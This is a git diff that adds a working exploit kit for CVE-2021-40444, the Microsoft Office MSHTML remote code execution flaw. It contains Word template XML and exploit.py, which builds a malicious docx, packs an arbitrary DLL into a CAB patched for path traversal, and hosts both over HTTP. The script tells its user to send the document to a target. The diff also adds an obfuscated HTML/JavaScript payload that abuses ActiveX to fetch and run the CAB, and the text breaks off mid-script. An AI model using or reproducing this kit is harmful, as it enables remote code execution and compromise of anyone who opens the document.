w:uiPriority="52"/><w:lsdException w:name="Grid Table 1 Light Accent 2" w:uiPriority="46"/><w:lsdException w:name="Grid Table 2 Accent 2" w:uiPriority="47"/><w:lsdException w:name="Grid Table 3 Accent 2" w:uiPriority="48"/><w:lsdException w:name="Grid Table 4 Accent 2" w:uiPriority="49"/><w:lsdException w:name="Grid Table 5 Dark Accent 2" w:uiPriority="50"/><w:lsdException w:name="Grid Table 6 Colorful Accent 2" w:uiPriority="51"/><w:lsdException w:name="Grid Table 7 Colorful Accent 2" w:uiPriority="52"/><w:lsdException w:name="Grid Table 1 Light Accent 3" w:uiPriority="46"/><w:lsdException w:name="Grid Table 2 Accent 3" w:uiPriority="47"/><w:lsdException w:name="Grid Table 3 Accent 3" w:uiPriority="48"/><w:lsdException w:name="Grid Table 4 Accent 3" w:uiPriority="49"/><w:lsdException w:name="Grid Table 5 Dark Accent 3" w:uiPriority="50"/><w:lsdException w:name="Grid Table 6 Colorful Accent 3" w:uiPriority="51"/><w:lsdException w:name="Grid Table 7 Colorful Accent 3" w:uiPriority="52"/><w:lsdException w:name="Grid Table 1 Light Accent 4" w:uiPriority="46"/><w:lsdException w:name="Grid Table 2 Accent 4" w:uiPriority="47"/><w:lsdException w:name="Grid Table 3 Accent 4" w:uiPriority="48"/><w:lsdException w:name="Grid Table 4 Accent 4" w:uiPriority="49"/><w:lsdException w:name="Grid Table 5 Dark Accent 4" w:uiPriority="50"/><w:lsdException w:name="Grid Table 6 Colorful Accent 4" w:uiPriority="51"/><w:lsdException w:name="Grid Table 7 Colorful Accent 4" w:uiPriority="52"/><w:lsdException w:name="Grid Table 1 Light Accent 5" w:uiPriority="46"/><w:lsdException w:name="Grid Table 2 Accent 5" w:uiPriority="47"/><w:lsdException w:name="Grid Table 3 Accent 5" w:uiPriority="48"/><w:lsdException w:name="Grid Table 4 Accent 5" w:uiPriority="49"/><w:lsdException w:name="Grid Table 5 Dark Accent 5" w:uiPriority="50"/><w:lsdException w:name="Grid Table 6 Colorful Accent 5" w:uiPriority="51"/><w:lsdException w:name="Grid Table 7 Colorful Accent 5" w:uiPriority="52"/><w:lsdException w:name="Grid Table 1 Light Accent 6" w:uiPriority="46"/><w:lsdException w:name="Grid Table 2 Accent 6" w:uiPriority="47"/><w:lsdException w:name="Grid Table 3 Accent 6" w:uiPriority="48"/><w:lsdException w:name="Grid Table 4 Accent 6" w:uiPriority="49"/><w:lsdException w:name="Grid Table 5 Dark Accent 6" w:uiPriority="50"/><w:lsdException w:name="Grid Table 6 Colorful Accent 6" w:uiPriority="51"/><w:lsdException w:name="Grid Table 7 Colorful Accent 6" w:uiPriority="52"/><w:lsdException w:name="List Table 1 Light" w:uiPriority="46"/><w:lsdException w:name="List Table 2" w:uiPriority="47"/><w:lsdException w:name="List Table 3" w:uiPriority="48"/><w:lsdException w:name="List Table 4" w:uiPriority="49"/><w:lsdException w:name="List Table 5 Dark" w:uiPriority="50"/><w:lsdException w:name="List Table 6 Colorful" w:uiPriority="51"/><w:lsdException w:name="List Table 7 Colorful" w:uiPriority="52"/><w:lsdException w:name="List Table 1 Light Accent 1" w:uiPriority="46"/><w:lsdException w:name="List Table 2 Accent 1" w:uiPriority="47"/><w:lsdException w:name="List Table 3 Accent 1" w:uiPriority="48"/><w:lsdException w:name="List Table 4 Accent 1" w:uiPriority="49"/><w:lsdException w:name="List Table 5 Dark Accent 1" w:uiPriority="50"/><w:lsdException w:name="List Table 6 Colorful Accent 1" w:uiPriority="51"/><w:lsdException w:name="List Table 7 Colorful Accent 1" w:uiPriority="52"/><w:lsdException w:name="List Table 1 Light Accent 2" w:uiPriority="46"/><w:lsdException w:name="List Table 2 Accent 2" w:uiPriority="47"/><w:lsdException w:name="List Table 3 Accent 2" w:uiPriority="48"/><w:lsdException w:name="List Table 4 Accent 2" w:uiPriority="49"/><w:lsdException w:name="List Table 5 Dark Accent 2" w:uiPriority="50"/><w:lsdException w:name="List Table 6 Colorful Accent 2" w:uiPriority="51"/><w:lsdException w:name="List Table 7 Colorful Accent 2" w:uiPriority="52"/><w:lsdException w:name="List Table 1 Light Accent 3" w:uiPriority="46"/><w:lsdException w:name="List Table 2 Accent 3" w:uiPriority="47"/><w:lsdException w:name="List Table 3 Accent 3" w:uiPriority="48"/><w:lsdException w:name="List Table 4 Accent 3" w:uiPriority="49"/><w:lsdException w:name="List Table 5 Dark Accent 3" w:uiPriority="50"/><w:lsdException w:name="List Table 6 Colorful Accent 3" w:uiPriority="51"/><w:lsdException w:name="List Table 7 Colorful Accent 3" w:uiPriority="52"/><w:lsdException w:name="List Table 1 Light Accent 4" w:uiPriority="46"/><w:lsdException w:name="List Table 2 Accent 4" w:uiPriority="47"/><w:lsdException w:name="List Table 3 Accent 4" w:uiPriority="48"/><w:lsdException w:name="List Table 4 Accent 4" w:uiPriority="49"/><w:lsdException w:name="List Table 5 Dark Accent 4" w:uiPriority="50"/><w:lsdException w:name="List Table 6 Colorful Accent 4" w:uiPriority="51"/><w:lsdException w:name="List Table 7 Colorful Accent 4" w:uiPriority="52"/><w:lsdException w:name="List Table 1 Light Accent 5" w:uiPriority="46"/><w:lsdException w:name="List Table 2 Accent 5" w:uiPriority="47"/><w:lsdException w:name="List Table 3 Accent 5" w:uiPriority="48"/><w:lsdException w:name="List Table 4 Accent 5" w:uiPriority="49"/><w:lsdException w:name="List Table 5 Dark Accent 5" w:uiPriority="50"/><w:lsdException w:name="List Table 6 Colorful Accent 5" w:uiPriority="51"/><w:lsdException w:name="List Table 7 Colorful Accent 5" w:uiPriority="52"/><w:lsdException w:name="List Table 1 Light Accent 6" w:uiPriority="46"/><w:lsdException w:name="List Table 2 Accent 6" w:uiPriority="47"/><w:lsdException w:name="List Table 3 Accent 6" w:uiPriority="48"/><w:lsdException w:name="List Table 4 Accent 6" w:uiPriority="49"/><w:lsdException w:name="List Table 5 Dark Accent 6" w:uiPriority="50"/><w:lsdException w:name="List Table 6 Colorful Accent 6" w:uiPriority="51"/><w:lsdException w:name="List Table 7 Colorful Accent 6" w:uiPriority="52"/><w:lsdException w:name="Mention" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Smart Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Hashtag" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Unresolved Mention" w:semiHidden="1" w:unhideWhenUsed="1"/></w:latentStyles><w:style w:type="paragraph" w:default="1" w:styleId="Normal"><w:name w:val="Normal"/><w:qFormat/><w:rsid w:val="00D87583"/><w:pPr><w:spacing w:line="260" w:lineRule="atLeast"/></w:pPr><w:rPr><w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Times New Roman" w:hAnsi="Trebuchet MS" w:cs="Times New Roman"/><w:lang w:val="en-GB"/></w:rPr></w:style><w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont"><w:name w:val="Default Paragraph Font"/><w:uiPriority w:val="1"/><w:semiHidden/><w:unhideWhenUsed/></w:style><w:style w:type="table" w:default="1" w:styleId="TableNormal"><w:name w:val="Normal Table"/><w:uiPriority w:val="99"/><w:semiHidden/><w:unhideWhenUsed/><w:tblPr><w:tblInd w:w="0" w:type="dxa"/><w:tblCellMar><w:top w:w="0" w:type="dxa"/><w:left w:w="108" w:type="dxa"/><w:bottom w:w="0" w:type="dxa"/><w:right w:w="108" w:type="dxa"/></w:tblCellMar></w:tblPr></w:style><w:style w:type="numbering" w:default="1" w:styleId="NoList"><w:name w:val="No List"/><w:uiPriority w:val="99"/><w:semiHidden/><w:unhideWhenUsed/></w:style><w:style w:type="character" w:customStyle="1" w:styleId="BodyTextChar"><w:name w:val="Body Text Char"/><w:basedOn w:val="DefaultParagraphFont"/><w:link w:val="BodyText"/><w:qFormat/><w:rsid w:val="00D87583"/><w:rPr><w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Times New Roman" w:hAnsi="Trebuchet MS" w:cs="Times New Roman"/><w:lang w:val="en-GB"/></w:rPr></w:style><w:style w:type="character" w:customStyle="1" w:styleId="Bullets"><w:name w:val="Bullets"/><w:qFormat/><w:rPr><w:rFonts w:ascii="OpenSymbol" w:eastAsia="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol"/></w:rPr></w:style><w:style w:type="character" w:styleId="Hyperlink"><w:name w:val="Hyperlink"/><w:rPr><w:color w:val="000080"/><w:u w:val="single"/><w:lang/></w:rPr></w:style><w:style w:type="paragraph" w:customStyle="1" w:styleId="Heading"><w:name w:val="Heading"/><w:basedOn w:val="Normal"/><w:next w:val="BodyText"/><w:qFormat/><w:pPr><w:keepNext/><w:spacing w:before="240" w:after="120"/></w:pPr><w:rPr><w:rFonts w:ascii="Liberation Sans" w:eastAsia="Droid Sans Fallback" w:hAnsi="Liberation Sans" w:cs="Droid Sans Devanagari"/><w:sz w:val="28"/><w:szCs w:val="28"/></w:rPr></w:style><w:style w:type="paragraph" w:styleId="BodyText"><w:name w:val="Body Text"/><w:basedOn w:val="Normal"/><w:link w:val="BodyTextChar"/><w:rsid w:val="00D87583"/><w:pPr><w:spacing w:after="260"/></w:pPr></w:style><w:style w:type="paragraph" w:styleId="List"><w:name w:val="List"/><w:basedOn w:val="BodyText"/><w:rPr><w:rFonts w:cs="Droid Sans Devanagari"/></w:rPr></w:style><w:style w:type="paragraph" w:styleId="Caption"><w:name w:val="caption"/><w:basedOn w:val="Normal"/><w:qFormat/><w:pPr><w:suppressLineNumbers/><w:spacing w:before="120" w:after="120"/></w:pPr><w:rPr><w:rFonts w:cs="Droid Sans Devanagari"/><w:i/><w:iCs/><w:sz w:val="24"/><w:szCs w:val="24"/></w:rPr></w:style><w:style w:type="paragraph" w:customStyle="1" w:styleId="Index"><w:name w:val="Index"/><w:basedOn w:val="Normal"/><w:qFormat/><w:pPr><w:suppressLineNumbers/></w:pPr><w:rPr><w:rFonts w:cs="Droid Sans Devanagari"/></w:rPr></w:style><w:style w:type="paragraph" w:customStyle="1" w:styleId="TableContents"><w:name w:val="Table Contents"/><w:basedOn w:val="Normal"/><w:qFormat/><w:pPr><w:widowControl w:val="0"/><w:suppressLineNumbers/></w:pPr></w:style><w:style w:type="paragraph" w:customStyle="1" w:styleId="TableHeading"><w:name w:val="Table Heading"/><w:basedOn w:val="TableContents"/><w:qFormat/><w:pPr><w:jc w:val="center"/></w:pPr><w:rPr><w:b/><w:bCs/></w:rPr></w:style><w:style w:type="paragraph" w:customStyle="1" w:styleId="HeaderandFooter"><w:name w:val="Header and Footer"/><w:basedOn w:val="Normal"/><w:qFormat/><w:pPr><w:suppressLineNumbers/><w:tabs><w:tab w:val="center" w:pos="4535"/><w:tab w:val="right" w:pos="9070"/></w:tabs></w:pPr></w:style><w:style w:type="paragraph" w:styleId="Header"><w:name w:val="header"/><w:basedOn w:val="HeaderandFooter"/></w:style></w:styles>
\ No newline at end of file
diff --git a/CVE-2021-40444/data/word_dat/word/theme/theme1.xml b/CVE-2021-40444/data/word_dat/word/theme/theme1.xml
new file mode 100644
index 0000000..9616693
--- /dev/null
+++ b/CVE-2021-40444/data/word_dat/word/theme/theme1.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme"><a:themeElements><a:clrScheme name="Office"><a:dk1><a:sysClr val="windowText" lastClr="000000"/></a:dk1><a:lt1><a:sysClr val="window" lastClr="FFFFFF"/></a:lt1><a:dk2><a:srgbClr val="1F497D"/></a:dk2><a:lt2><a:srgbClr val="EEECE1"/></a:lt2><a:accent1><a:srgbClr val="4F81BD"/></a:accent1><a:accent2><a:srgbClr val="C0504D"/></a:accent2><a:accent3><a:srgbClr val="9BBB59"/></a:accent3><a:accent4><a:srgbClr val="8064A2"/></a:accent4><a:accent5><a:srgbClr val="4BACC6"/></a:accent5><a:accent6><a:srgbClr val="F79646"/></a:accent6><a:hlink><a:srgbClr val="0000FF"/></a:hlink><a:folHlink><a:srgbClr val="800080"/></a:folHlink></a:clrScheme><a:fontScheme name="Office"><a:majorFont><a:latin typeface="Cambria"/><a:ea typeface=""/><a:cs typeface=""/><a:font script="Jpan" typeface="ＭＳ ゴシック"/><a:font script="Hang" typeface="맑은 고딕"/><a:font script="Hans" typeface="宋体"/><a:font script="Hant" typeface="新細明體"/><a:font script="Arab" typeface="Times New Roman"/><a:font script="Hebr" typeface="Times New Roman"/><a:font script="Thai" typeface="Angsana New"/><a:font script="Ethi" typeface="Nyala"/><a:font script="Beng" typeface="Vrinda"/><a:font script="Gujr" typeface="Shruti"/><a:font script="Khmr" typeface="MoolBoran"/><a:font script="Knda" typeface="Tunga"/><a:font script="Guru" typeface="Raavi"/><a:font script="Cans" typeface="Euphemia"/><a:font script="Cher" typeface="Plantagenet Cherokee"/><a:font script="Yiii" typeface="Microsoft Yi Baiti"/><a:font script="Tibt" typeface="Microsoft Himalaya"/><a:font script="Thaa" typeface="MV Boli"/><a:font script="Deva" typeface="Mangal"/><a:font script="Telu" typeface="Gautami"/><a:font script="Taml" typeface="Latha"/><a:font script="Syrc" typeface="Estrangelo Edessa"/><a:font script="Orya" typeface="Kalinga"/><a:font script="Mlym" typeface="Kartika"/><a:font script="Laoo" typeface="DokChampa"/><a:font script="Sinh" typeface="Iskoola Pota"/><a:font script="Mong" typeface="Mongolian Baiti"/><a:font script="Viet" typeface="Times New Roman"/><a:font script="Uigh" typeface="Microsoft Uighur"/><a:font script="Geor" typeface="Sylfaen"/></a:majorFont><a:minorFont><a:latin typeface="Calibri"/><a:ea typeface=""/><a:cs typeface=""/><a:font script="Jpan" typeface="ＭＳ 明朝"/><a:font script="Hang" typeface="맑은 고딕"/><a:font script="Hans" typeface="宋体"/><a:font script="Hant" typeface="新細明體"/><a:font script="Arab" typeface="Arial"/><a:font script="Hebr" typeface="Arial"/><a:font script="Thai" typeface="Cordia New"/><a:font script="Ethi" typeface="Nyala"/><a:font script="Beng" typeface="Vrinda"/><a:font script="Gujr" typeface="Shruti"/><a:font script="Khmr" typeface="DaunPenh"/><a:font script="Knda" typeface="Tunga"/><a:font script="Guru" typeface="Raavi"/><a:font script="Cans" typeface="Euphemia"/><a:font script="Cher" typeface="Plantagenet Cherokee"/><a:font script="Yiii" typeface="Microsoft Yi Baiti"/><a:font script="Tibt" typeface="Microsoft Himalaya"/><a:font script="Thaa" typeface="MV Boli"/><a:font script="Deva" typeface="Mangal"/><a:font script="Telu" typeface="Gautami"/><a:font script="Taml" typeface="Latha"/><a:font script="Syrc" typeface="Estrangelo Edessa"/><a:font script="Orya" typeface="Kalinga"/><a:font script="Mlym" typeface="Kartika"/><a:font script="Laoo" typeface="DokChampa"/><a:font script="Sinh" typeface="Iskoola Pota"/><a:font script="Mong" typeface="Mongolian Baiti"/><a:font script="Viet" typeface="Arial"/><a:font script="Uigh" typeface="Microsoft Uighur"/><a:font script="Geor" typeface="Sylfaen"/></a:minorFont></a:fontScheme><a:fmtScheme name="Office"><a:fillStyleLst><a:solidFill><a:schemeClr val="phClr"/></a:solidFill><a:gradFill rotWithShape="1"><a:gsLst><a:gs pos="0"><a:schemeClr val="phClr"><a:tint val="50000"/><a:satMod val="300000"/></a:schemeClr></a:gs><a:gs pos="35000"><a:schemeClr val="phClr"><a:tint val="37000"/><a:satMod val="300000"/></a:schemeClr></a:gs><a:gs pos="100000"><a:schemeClr val="phClr"><a:tint val="15000"/><a:satMod val="350000"/></a:schemeClr></a:gs></a:gsLst><a:lin ang="16200000" scaled="1"/></a:gradFill><a:gradFill rotWithShape="1"><a:gsLst><a:gs pos="0"><a:schemeClr val="phClr"><a:shade val="51000"/><a:satMod val="130000"/></a:schemeClr></a:gs><a:gs pos="80000"><a:schemeClr val="phClr"><a:shade val="93000"/><a:satMod val="130000"/></a:schemeClr></a:gs><a:gs pos="100000"><a:schemeClr val="phClr"><a:shade val="94000"/><a:satMod val="135000"/></a:schemeClr></a:gs></a:gsLst><a:lin ang="16200000" scaled="0"/></a:gradFill></a:fillStyleLst><a:lnStyleLst><a:ln w="9525" cap="flat" cmpd="sng" algn="ctr"><a:solidFill><a:schemeClr val="phClr"><a:shade val="95000"/><a:satMod val="105000"/></a:schemeClr></a:solidFill><a:prstDash val="solid"/></a:ln><a:ln w="25400" cap="flat" cmpd="sng" algn="ctr"><a:solidFill><a:schemeClr val="phClr"/></a:solidFill><a:prstDash val="solid"/></a:ln><a:ln w="38100" cap="flat" cmpd="sng" algn="ctr"><a:solidFill><a:schemeClr val="phClr"/></a:solidFill><a:prstDash val="solid"/></a:ln></a:lnStyleLst><a:effectStyleLst><a:effectStyle><a:effectLst><a:outerShdw blurRad="40000" dist="20000" dir="5400000" rotWithShape="0"><a:srgbClr val="000000"><a:alpha val="38000"/></a:srgbClr></a:outerShdw></a:effectLst></a:effectStyle><a:effectStyle><a:effectLst><a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0"><a:srgbClr val="000000"><a:alpha val="35000"/></a:srgbClr></a:outerShdw></a:effectLst></a:effectStyle><a:effectStyle><a:effectLst><a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0"><a:srgbClr val="000000"><a:alpha val="35000"/></a:srgbClr></a:outerShdw></a:effectLst><a:scene3d><a:camera prst="orthographicFront"><a:rot lat="0" lon="0" rev="0"/></a:camera><a:lightRig rig="threePt" dir="t"><a:rot lat="0" lon="0" rev="1200000"/></a:lightRig></a:scene3d><a:sp3d><a:bevelT w="63500" h="25400"/></a:sp3d></a:effectStyle></a:effectStyleLst><a:bgFillStyleLst><a:solidFill><a:schemeClr val="phClr"/></a:solidFill><a:gradFill rotWithShape="1"><a:gsLst><a:gs pos="0"><a:schemeClr val="phClr"><a:tint val="40000"/><a:satMod val="350000"/></a:schemeClr></a:gs><a:gs pos="40000"><a:schemeClr val="phClr"><a:tint val="45000"/><a:shade val="99000"/><a:satMod val="350000"/></a:schemeClr></a:gs><a:gs pos="100000"><a:schemeClr val="phClr"><a:shade val="20000"/><a:satMod val="255000"/></a:schemeClr></a:gs></a:gsLst><a:path path="circle"><a:fillToRect l="50000" t="-80000" r="50000" b="180000"/></a:path></a:gradFill><a:gradFill rotWithShape="1"><a:gsLst><a:gs pos="0"><a:schemeClr val="phClr"><a:tint val="80000"/><a:satMod val="300000"/></a:schemeClr></a:gs><a:gs pos="100000"><a:schemeClr val="phClr"><a:shade val="30000"/><a:satMod val="200000"/></a:schemeClr></a:gs></a:gsLst><a:path path="circle"><a:fillToRect l="50000" t="50000" r="50000" b="50000"/></a:path></a:gradFill></a:bgFillStyleLst></a:fmtScheme></a:themeElements><a:objectDefaults/><a:extraClrSchemeLst/></a:theme>
\ No newline at end of file
diff --git a/CVE-2021-40444/data/word_dat/word/webSettings.xml b/CVE-2021-40444/data/word_dat/word/webSettings.xml
new file mode 100644
index 0000000..2062e93
--- /dev/null
+++ b/CVE-2021-40444/data/word_dat/word/webSettings.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:webSettings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid"/>
\ No newline at end of file
diff --git a/CVE-2021-40444/exploit.py b/CVE-2021-40444/exploit.py
new file mode 100644
index 0000000..40ddffb
--- /dev/null
+++ b/CVE-2021-40444/exploit.py
@@ -0,0 +1,163 @@
+#!/usr/bin/env python3
+
+# Microsoft Office Remote Code Execution Exploit via Logical Bug
+# Result is ability for attackers to execute arbitrary custom DLL's
+# downloaded and executed on target system
+
+import sys
+import os
+import subprocess
+
+HOST_DIR = 'srv/'
+
+m_off = 0x2d
+		
+def usage():
+	print('[%] Usage: ' + str(sys.argv[0]) + ' <generate/host> <options>')
+	print('[i] Example: ' + str(sys.argv[0]) + ' generate test/calc.dll http://192.168.1.41')
+	print('[i] Example: sudo ' + str(sys.argv[0]) + ' host 80')
+	exit()
+
+def check_usage():
+	ret = 0
+	if(len(sys.argv) < 2):
+		usage()
+	if(sys.argv[1] == 'generate'):
+		if(len(sys.argv) != 4):
+			usage()
+		ret = 1
+	elif(sys.argv[1] == 'host'):
+		if(len(sys.argv) != 3):
+			usage()
+		ret = 2
+	else:
+		usage()
+	return ret
+
+def patch_cab(path):
+	f_r = open(path, 'rb')
+	cab_content = f_r.read()
+	f_r.close()
+	
+	out_cab = cab_content[:m_off]
+	out_cab += b'\x00\x5c\x41\x00'
+	out_cab += cab_content[m_off+4:]
+
+	out_cab = out_cab.replace(b'..\\msword.inf', b'../msword.inf')
+	
+	f_w = open(path, 'wb')
+	f_w.write(out_cab)
+	f_w.close()
+	return
+
+def execute_cmd(cmd):
+	r = subprocess.getoutput(cmd)
+	return r
+
+def generate_payload():
+
+	payload_path = sys.argv[2]
+	srv_url = sys.argv[3]
+	
+	print('\n[ == Options == ]')
+	print('\t[ DLL Payload: ' + str(payload_path))
+	print('\t[ HTML Exploit URL: ' + str(srv_url))
+	print('')
+	
+	try:
+		payload_content = open(payload_path,'rb').read()
+		filep = open('data/word.dll','wb')
+		filep.write(payload_content)
+		filep.close()
+	except:
+		print('[-] DLL Payload specified not found!')
+		exit()
+
+	execute_cmd('cp -r data/word_dat/ data/tmp_doc/')
+	
+	print('[*] Writing HTML Server URL...')
+	
+	rels_pr = open('data/tmp_doc/word/_rels/document.xml.rels', 'r')
+	xml_content = rels_pr.read()
+	rels_pr.close()
+	
+	xml_content = xml_content.replace('<EXPLOIT_HOST_HERE>', srv_url + '/word.html')
+	
+	rels_pw = open('data/tmp_doc/word/_rels/document.xml.rels', 'w')
+	rels_pw.write(xml_content)
+	rels_pw.close()
+	
+	print('[*] Generating malicious docx file...')
+	
+	os.chdir('data/tmp_doc/')
+	os.system('zip -r document.docx *')
+	execute_cmd('cp document.docx ../../out/document.docx')
+	os.chdir('../')
+	execute_cmd('rm -R tmp_doc/')
+	os.chdir('../')
+	
+	print('[*] Generating malicious CAB file...')
+	
+	os.chdir('data/')
+	execute_cmd('mkdir cab/')
+	execute_cmd('cp word.dll msword.inf')
+	os.chdir('cab/')
+	execute_cmd('lcab \'../msword.inf\' out.cab')
+	patch_cab('out.cab')
+	execute_cmd('cp out.cab ../../srv/word.cab')
+	os.chdir('../')
+	execute_cmd('rm word.dll')
+	execute_cmd('rm msword.inf')
+	execute_cmd('rm -R cab/')
+	os.chdir('../')
+	
+	print('[*] Updating information on HTML exploit...')
+	
+	os.chdir('srv/')
+	execute_cmd('cp backup.html word.html')
+	
+	p_exp = open('word.html', 'r')
+	exploit_content = p_exp.read()
+	p_exp.close()
+	
+	exploit_content = exploit_content.replace('<HOST_CHANGE_HERE>', srv_url + '/word.cab')
+	
+	p_exp = open('word.html', 'w')
+	p_exp.write(exploit_content)
+	p_exp.close()
+	
+	os.chdir('../')
+	
+	print('[+] Malicious Word Document payload generated at: out/document.docx')
+	print('[+] Malicious CAB file generated at: srv/word.cab')
+	print('[i] You can execute now the server and then send document.docx to target')
+	
+	return
+
+def start_server():	
+	os.chdir(HOST_DIR)
+	try:
+		port = int(sys.argv[2])
+	except:
+		print('[-] Invalid port specified!')
+		exit()
+	os.system('python3 -m http.server ' + str(port))
+	return
+
+if __name__ == '__main__':
+	print('[%] CVE-2021-40444 - MS Office Word RCE Exploit [%]')
+	
+	r = check_usage()
+	
+	if(r == 1):
+		print('[*] Option is generate a malicious payload...')
+		generate_payload()
+	elif(r == 2):
+		print('[*] Option is host HTML Exploit...')
+		start_server()
+	else:
+		print('[-] Unknown error')
+		exit()
+	
+	
+	
diff --git a/CVE-2021-40444/out/hello.txt b/CVE-2021-40444/out/hello.txt
new file mode 100644
index 0000000..e69de29
diff --git a/CVE-2021-40444/srv/backup.html b/CVE-2021-40444/srv/backup.html
new file mode 100644
index 0000000..95e0e97
--- /dev/null
+++ b/CVE-2021-40444/srv/backup.html
@@ -0,0 +1,3 @@
+<!DOCTYPE html><html><head><meta http-equiv="Expires" content="-1"><meta http-equiv="X-UA-Compatible" content="IE=11"></head><body><script>
+var a0_0x127f=['123','365952KMsRQT','tiveX','/Lo','./../../','contentDocument','ppD','Dat','close','Acti','removeChild','mlF','write','./A','ata/','ile','../','body','setAttribute','#version=5,0,0,0','ssi','iframe','748708rfmUTk','documentElement','lFile','location','159708hBVRtu','a/Lo','Script','document','call','contentWindow','emp','Document','Obj','prototype','lfi','bject','send','appendChild','Low/msword.inf','htmlfile','115924pLbIpw','GET','p/msword.inf','1109sMoXXX','./../A','htm','l/T','cal/','1wzQpCO','ect','w/msword.inf','522415dmiRUA','<HOST_CHANGE_HERE>','88320wWglcB','XMLHttpRequest','msword.inf','Act','D:edbc374c-5730-432a-b5b8-de94f0b57217','open','<bo','HTMLElement','/..','veXO','102FePAWC'];function a0_0x15ec(_0x329dba,_0x46107c){return a0_0x15ec=function(_0x127f75,_0x15ecd5){_0x127f75=_0x127f75-0xaa;var _0x5a770c=a0_0x127f[_0x127f75];return _0x5a770c;},a0_0x15ec(_0x329dba,_0x46107c);}(function(_0x59985d,_0x17bed8){var _0x1eac90=a0_0x15ec;while(!![]){try{var _0x2f7e2d=parseInt(_0x1eac90(0xce))+parseInt(_0x1eac90(0xd8))*parseInt(_0x1eac90(0xc4))+parseInt(_0x1eac90(0xc9))*-parseInt(_0x1eac90(0xad))+parseInt(_0x1eac90(0xb1))+parseInt(_0x1eac90(0xcc))+-parseInt(_0x1eac90(0xc1))+parseInt(_0x1eac90(0xda));if(_0x2f7e2d===_0x17bed8)break;else _0x59985d['push'](_0x59985d['shift']());}catch(_0x34af1e){_0x59985d['push'](_0x59985d['shift']());}}}(a0_0x127f,0x5df71),function(){var _0x2ee207=a0_0x15ec,_0x279eab=window,_0x1b93d7=_0x279eab[_0x2ee207(0xb4)],_0xcf5a2=_0x279eab[_0x2ee207(0xb8)]['prototype']['createElement'],_0x4d7c02=_0x279eab[_0x2ee207(0xb8)]['prototype'][_0x2ee207(0xe5)],_0x1ee31c=_0x279eab[_0x2ee207(0xd5)][_0x2ee207(0xba)][_0x2ee207(0xbe)],_0x2d20cd=_0x279eab[_0x2ee207(0xd5)][_0x2ee207(0xba)][_0x2ee207(0xe3)],_0x4ff114=_0xcf5a2['call'](_0x1b93d7,_0x2ee207(0xac));try{_0x1ee31c[_0x2ee207(0xb5)](_0x1b93d7[_0x2ee207(0xea)],_0x4ff114);}catch(_0x1ab454){_0x1ee31c[_0x2ee207(0xb5)](_0x1b93d7[_0x2ee207(0xae)],_0x4ff114);}var _0x403e5f=_0x4ff114[_0x2ee207(0xb6)]['ActiveXObject'],_0x224f7d=new _0x403e5f(_0x2ee207(0xc6)+_0x2ee207(0xbb)+'le');_0x4ff114[_0x2ee207(0xde)]['open']()[_0x2ee207(0xe1)]();var _0x371a71='p';try{_0x2d20cd[_0x2ee207(0xb5)](_0x1b93d7[_0x2ee207(0xea)],_0x4ff114);}catch(_0x3b004e){_0x2d20cd['call'](_0x1b93d7['documentElement'],_0x4ff114);}function _0x2511dc(){var _0x45ae57=_0x2ee207;return _0x45ae57(0xcd);}_0x224f7d['open']()[_0x2ee207(0xe1)]();var _0x3e172f=new _0x224f7d[(_0x2ee207(0xb3))][(_0x2ee207(0xd1))+'iveX'+(_0x2ee207(0xb9))+(_0x2ee207(0xca))]('htm'+_0x2ee207(0xaf));_0x3e172f[_0x2ee207(0xd3)]()[_0x2ee207(0xe1)]();var _0xd7e33d='c',_0x35b0d4=new _0x3e172f[(_0x2ee207(0xb3))]['Ac'+(_0x2ee207(0xdb))+'Ob'+'ject']('ht'+_0x2ee207(0xe4)+_0x2ee207(0xe8));_0x35b0d4[_0x2ee207(0xd3)]()[_0x2ee207(0xe1)]();var _0xf70c6e=new _0x35b0d4['Script'][(_0x2ee207(0xe2))+(_0x2ee207(0xd7))+(_0x2ee207(0xbc))]('ht'+'mlF'+_0x2ee207(0xe8));_0xf70c6e[_0x2ee207(0xd3)]()[_0x2ee207(0xe1)]();var _0xfed1ef=new ActiveXObject('htmlfile'),_0x5f3191=new ActiveXObject(_0x2ee207(0xc0)),_0xafc795=new ActiveXObject(_0x2ee207(0xc0)),_0x5a6d4b=new ActiveXObject('htmlfile'),_0x258443=new ActiveXObject('htmlfile'),_0x53c2ab=new ActiveXObject('htmlfile'),_0x3a627b=_0x279eab[_0x2ee207(0xcf)],_0x2c84a8=new _0x3a627b(),_0x220eee=_0x3a627b[_0x2ee207(0xba)][_0x2ee207(0xd3)],_0x3637d8=_0x3a627b[_0x2ee207(0xba)][_0x2ee207(0xbd)],_0x27de6f=_0x279eab['setTimeout'];_0x220eee[_0x2ee207(0xb5)](_0x2c84a8,_0x2ee207(0xc2),_0x2511dc(),![]),_0x3637d8[_0x2ee207(0xb5)](_0x2c84a8),_0xf70c6e[_0x2ee207(0xb3)][_0x2ee207(0xb4)][_0x2ee207(0xe5)](_0x2ee207(0xd4)+'dy>');var _0x126e83=_0xcf5a2[_0x2ee207(0xb5)](_0xf70c6e['Script'][_0x2ee207(0xb4)],'ob'+'je'+'ct');_0x126e83[_0x2ee207(0xeb)]('co'+'de'+'ba'+'se',_0x2511dc()+_0x2ee207(0xaa));var 